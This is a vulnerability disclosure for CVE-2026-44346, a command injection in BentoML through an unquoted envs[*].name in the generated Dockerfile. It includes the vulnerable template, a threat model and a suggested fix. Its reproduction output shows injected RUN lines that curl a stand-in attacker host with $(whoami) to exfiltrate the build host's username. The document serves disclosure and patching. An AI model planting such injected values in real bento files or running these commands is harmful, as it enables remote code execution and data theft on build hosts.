CVE-2026-44346

# BentoML `envs[*].name` Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043 A malicious `bentofile.yaml` containing a newline-injected value in `envs[*].name` produces unquoted `RUN` directives in the BentoML-generated Dockerfile. When the victim runs `bentoml containerize` on the imported bento, those `RUN` directives execute on the host during `docker build`. Verified end-to-end on `bentoml==1.4.38`. ## Vulnerable code `src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73`: ```jinja {% for env in __bento_envs__ %} {% set stage = env.stage | default("all") -%} {% if stage != "runtime" -%} ARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %} ENV {{ env.name }}=${{ env.name }} {% endif -%} {% endfor %} ``` `env.value` is bash-quoted via the `bash_quote` filter, but **`env.name` is interpolated raw** with no escaping or newline filtering. The template is rendered by `_bentoml_impl/docker.generate_dockerfile` (the v2 SDK Docker generation path used by `bentoml containerize` for modern services). ## Sibling relationship to existing CVEs The earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field: - **CVE-2026-33744 / GHSA-jfjg-vc52-wqvf** (2026-03-25): added `bash_quote` to `system_packages` interpolation in Dockerfile templates and `images.py`. - **CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw** (2026-04-02): added `shlex.quote` to `system_packages` in the cloud deployment path (`_internal/cloud/deployment.py:1648`). Both patches limit themselves to `system_packages`. The `envs[*].name` field is the same root-cause class (`bentofile.yaml` value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope. ## Reproduction ```bash pip install bentoml==1.4.38 python verify_render.py ``` Expected: ``` [*] rendered Dockerfile size: 1789 bytes [*] injected RUN lines: 3 RUN curl -fsSL http://attacker.example.com/$(whoami)=1 RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO RUN curl -fsSL http://attacker.example.com/$(whoami) ``` Each injected `RUN` line is a Dockerfile command that runs during `docker build`. With `$(whoami)` shell-substituted by Docker's RUN executor, the example payload exfiltrates the build host's username. ## Threat model 1. Attacker authors a malicious bento with a crafted `bentofile.yaml`. 2. Attacker exports the bento (`.bento` or `.tar.gz`) and distributes (S3, HTTP, BentoCloud share, etc.). 3. Victim imports with `bentoml import bento.tar`; no validation of `envs` content. 4. Victim runs `bentoml containerize` to build the container image. 5. BentoML renders the Dockerfile with the attacker's `envs` values, producing injected `RUN` lines. 6. `docker build` (or BuildKit) executes the injected `RUN` commands on the build host, achieving RCE in the victim's build environment. The flow mirrors CVE-2026-33744 exactly, with `envs` substituted for `system_packages`. ## Suggested fix In `base_v2.j2` lines 71-73, apply the `bash_quote` filter to `env.name` (and to the `=$VAR` reference in the `ENV` line, since the variable name itself is reused there): ```jinja ARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %} ENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }} ``` Better, since `env.name` is semantically a Dockerfile identifier, validate at the schema level: in `bentoml/_internal/bento/build_config.py:BentoEnvSchema`, add an `attr.validators.matches_re(r"^[A-Za-z_][A-Za-z0-9_]*$")` to the `name` field so newline / shell-metacharacter values are rejected at config load. ## Affected versions - bentoml 1.4.38 (verified end-to-end) - Likely all 1.x versions where `_bentoml_impl/docker.py` exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings. ## Disclosure Requesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request. ## PoC artifacts Gated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc